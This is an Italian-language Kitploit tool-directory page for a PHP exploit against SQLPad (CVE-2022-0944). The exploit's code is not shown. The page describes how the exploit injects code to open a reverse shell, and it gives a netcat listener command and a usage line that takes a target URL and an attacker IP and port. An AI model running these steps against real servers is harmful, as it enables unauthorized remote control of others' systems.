Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Exploit di esecuzione remota di codice | Kitploit
Strumenti/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Exploit di esecuzione remota di codice

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

Come funziona:

Questo codice PHP è progettato per sfruttare una vulnerabilità di Remote Code Execution (RCE) in SQLPad, legata a CVE-2022-0944.
Funziona iniettando codice dannoso nell'applicazione SQLPad, costringendola a eseguire un comando di sistema che apre una reverse shell – una connessione che concede all'attaccante il controllo remoto del sistema vulnerabile.


Prerequisiti:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (libreria PHP cURL) – sudo apt-get install php-curl

Utilizzo:

1. Configurare il Listener (sulla Macchina dell'Attaccante)

Per catturare la connessione della reverse shell, avvia Netcat sulla macchina dell'attaccante:

root@kitploit:~
nc -lvnp 4444

Eseguire l'Exploit

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: L'URL root dell'SQLPad vulnerabile (es. http://target.com:3000)

<attacker_ip>: L'indirizzo IP dell'attaccante in ascolto per la connessione inversa (lo stesso IP di Netcat)

<attacker_port>: La porta su cui l'attaccante è in ascolto (la stessa porta di Netcat)

Riferimenti

La logica originale dell'exploit si basa su questo repository:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

Il mio obiettivo qui era comprendere la logica dell'exploit e riscriverla in un altro linguaggio di programmazione come sfida personale.

Riferimento aggiuntivo: 🔗 CVE-2022-0944 – NVD

Scarica lo strumento